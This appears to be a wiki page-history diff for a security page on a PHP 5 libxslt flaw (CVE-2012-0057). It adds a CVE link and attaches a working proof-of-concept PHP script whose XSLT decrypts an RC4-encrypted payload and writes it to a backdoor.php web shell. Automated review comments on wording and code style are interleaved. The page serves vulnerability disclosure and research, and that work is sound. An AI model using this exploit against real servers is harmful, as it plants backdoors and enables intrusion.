Changes for page Application_PHP5
on 2012/01/16 11:37
on 2012/01/18 22:39
Summary
Page properties (1 modified, 0 added, 0 removed)
Attachments (0 modified, 1 added, 0 removed)
Details
- Page properties
- Content
... ... @@ -6,7 +6,7 @@ 6 6 7 7 = Creating files = 8 8 9 -Version 5 of the PHP language uses the [[libxslt>>Engine_libxslt]] engine to transform XML documents using XSLT. Prior to version 5.3.9, calls to libxslt were not restricted via xsltSetSecurityPrefs(). It was then possible to create or overwrite files on the engine side, typically for dropping a PHP Web Shell. This vulnerability ([[Bug #54446>>https://bugs.php.net/bug.php?id=54446||rel="__blank"]]) was patched in version 5.3.9 ([[ChangeLog>>http://php.net/ChangeLog-5.php#5.3.9||rel="__blank"]]). 9 +Version 5 of the PHP language uses the [[libxslt>>Engine_libxslt]] engine to transform XML documents using XSLT. Prior to version 5.3.9, calls to libxslt were not restricted via xsltSetSecurityPrefs(). It was then possible to create or overwrite files on the engine side, typically for dropping a PHP Web Shell. This vulnerability ([[Bug #54446>>https://bugs.php.net/bug.php?id=54446||rel="__blank"]] / ([[CVE-2012-0057>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0057||rel="__blank" title="CVE-2012-0057"]]) was patched in version 5.3.9 ([[ChangeLog>>http://php.net/ChangeLog-5.php#5.3.9||rel="__blank"]]). 10 10 11 11 == Simple PoC == 12 12 ... ... 
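Review bot: the parenthetical added in the + line is unbalanced: `([[Bug #54446>>...]] / ([[CVE-2012-0057>>...]])` opens two parentheses and closes only one, so the rendered page will show a stray `(` before the CVE link. Suggest `([[Bug #54446>>https://bugs.php.net/bug.php?id=54446||rel="__blank"]] / [[CVE-2012-0057>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0057||rel="__blank" title="CVE-2012-0057"]])`. While touching this sentence, it would help the reader to say what xsltSetSecurityPrefs() restricts (the file-creation capability the next sentence relies on), since the paragraph otherwise names the function without explaining why its absence matters.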
@@ -14,7 +14,7 @@ 14 14 15 15 == PoC with crypto == 16 16 17 -A better script was later posted on [[OSS-Security>>http://seclists.org/oss-sec/2012/q1/157]] at RedHat request. This PHP script will by default display a pre-filled HTML form including XML data, XSLT code and RC4-encrypted malicious PHP code. When the form is submitted, the user-controlled XML data is transformed using the user-controlled XSLT code. Then, the output of this transformation is displayed in the browser. Meanwhile, the malicious PHP code is decrypted using a static key ("simple_demo") and saved to "/var/www/xxx/backdoor.php". 17 +A better script was later posted on [[OSS-Security>>http://seclists.org/oss-sec/2012/q1/157]] at RedHat request. This PHP script ([[attach:php539-xslt.php]]) will by default display a pre-filled HTML form including XML data, XSLT code and RC4-encrypted malicious PHP code. When the form is submitted, the user-controlled XML data is transformed using the user-controlled XSLT code. Then, the output of this transformation is displayed in the browser. Meanwhile, the malicious PHP code is decrypted using a static key ("simple_demo") and saved to "/var/www/xxx/backdoor.php". 18 18 19 19 = Executing PHP code = 20 20
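Review bot: the new `[[attach:php539-xslt.php]]` link matches the attachment added in this same change, good. The description still does not say by which mechanism the decrypted code ends up in `/var/www/xxx/backdoor.php`; the attached script does it through `<sax:output href="/var/www/xxx/backdoor.php" method="text">`, so naming the sax:output extension here would make the paragraph self-explanatory and tie it to the "output path" hint the script prints. Minor style: "at RedHat request" reads better as "at Red Hat's request".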
- php539-xslt.php
- Author
... ... @@ -1,0 +1,1 @@ 1 +xwiki:XWiki.NicolasGregoire - Size
... ... @@ -1,0 +1,1 @@ 1 +2.0 KB - Content
... ... 
@@ -1,0 +1,68 @@ 1 + 2 +<?php 3 + 4 +// Get parameters 5 +$action = $_POST['action']; 6 +$xml = $_POST['xml']; 7 +$xsl = $_POST['xsl']; 8 + 9 +print "<html><body>"; 10 +if ($action == "transform") { 11 + 12 + print "<h2>Ready to transform ...</h2><br/>"; 13 + 14 + # LOAD XML FILE 15 + $xmldom = new DOMDocument(); 16 + print "XML: <pre>".htmlentities($xml)."</pre><br/>"; 17 + $xmldom->loadXML($xml); 18 + 19 + # LOAD XSLT FILE 20 + $xsldom = new DOMDocument(); 21 + print "XSL: <pre>".htmlentities($xsl)."</pre><br/>"; 22 + $xsldom->loadXML($xsl); // Content of $xXsl may be untrusted ! 23 + 24 + # START XSLT 25 + $xslproc = new XSLTProcessor(); 26 + $xslproc->importStylesheet($xsldom); 27 + 28 + # TRANSFORM & PRINT 29 + $output = $xslproc->transformToXML($xmldom); // File creation ! 30 + print "Output: <pre>".htmlentities($output)."</pre><br/>"; 31 + 32 +} else { 33 + 34 + # DISPLAY A PRE-FILLED FORM 35 + print "<h1>Hello!</h1><h2>You just have to click on submit() ...</h2>"; 36 + print "Consider modifying the output path (<i>/var/www/xxx/backdoor.php</i>) in the XSL<br/><br/>"; 37 + print "<form method='post'>"; 38 + print "XML document:<br/>"; 39 + print "<textarea name='xml' rows='3' cols='130'><foobar/></textarea><br/><br/>"; 40 + print "XSLT code:<br/>"; 41 + print "<textarea name='xsl' rows='20' cols='130'>"; 42 +print <<<XSLT 43 +<xsl:stylesheet 44 + version="1.0" 45 + xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 46 + xmlns:cry="http://exslt.org/crypto" 47 + xmlns:sax="http://icl.com/saxon" 48 + extension-element-prefixes="cry sax"> 49 + 50 + <xsl:template match="/"> 51 + <sax:output href="/var/www/xxx/backdoor.php" method="text"> 52 + <xsl:value-of select="cry:rc4_decrypt('simple_demo', '0262ee34196ae2df1ab850c1705ee0c38dc6ae42bbeecf140dea99675fb35539a4dcbeaf5c2e6a6cae679843dbf3650275a6be07464047dc17eff2661b8f065f0ae3abcd3b33e9fd3c48a36f2201ae65e093fa45b0a1b55cd408ec815a8dada050b8881b99e957704dc5f17208d105966680a26f')"/> 53 + </sax:output> 54 + <xsl:text>A 
webshell have been dropped</xsl:text> 55 + </xsl:template> 56 + 57 +</xsl:stylesheet> 58 +XSLT; 59 + print "</textarea><br/><br/>"; 60 + print "<input type='hidden' name='action' value='transform'/>"; 61 + print "<input type='submit'/></form>"; 62 + 63 +} 64 +print "</body></html>"; 65 + 66 +?> 67 + 68 +
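Review bot: the comment `// Content of $xXsl may be untrusted !` on line 22 of the added file refers to `$xXsl`, but the variable loaded there is `$xsl`; the comment should name the actual identifier. Two smaller points on the same file: lines 5-7 read `$_POST['action']`, `$_POST['xml']` and `$_POST['xsl']` without an `isset()` guard, so the first GET request that is meant to display the form raises undefined-index notices (e.g. `$action = isset($_POST['action']) ? $_POST['action'] : '';`), and the file begins with a blank line before `<?php`, which is emitted as output before any of the script's own `print` calls. The `<xsl:text>` message should read `A webshell has been dropped`.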